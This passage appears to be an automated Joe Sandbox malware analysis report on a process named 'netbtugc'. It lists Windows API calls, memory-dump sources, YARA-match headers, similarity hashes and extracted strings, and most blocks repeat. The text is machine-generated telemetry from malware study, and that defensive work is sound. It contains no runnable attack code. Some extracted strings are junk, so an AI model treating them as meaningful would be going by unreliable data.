                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  APIs
                                                                                                  • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02C782D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$NameName_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3514427675-0
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,89C3D2E1,00000007,00000000,00000004,00000000,02C63EBC,000000F4), ref: 02C796EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(02C61B99,?,02C75DE2,02C61B99,02C7563E,02C75DE2,?,02C61B99,02C7563E,00001000,?,?,00000000), ref: 02C7969F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C683CA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02C61E80,02C77F7F,02C7563E,02C61E50), ref: 02C681D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33210164165.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3790000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33210164165.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3790000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                  • API String ID: 0-3754132690
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034E4530
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034E454D
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034E4460
                                                                                                  • Execute=1, xrefs: 034E451E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 034E4592
                                                                                                  • ExecuteOptions, xrefs: 034E44AB
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034E4507
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280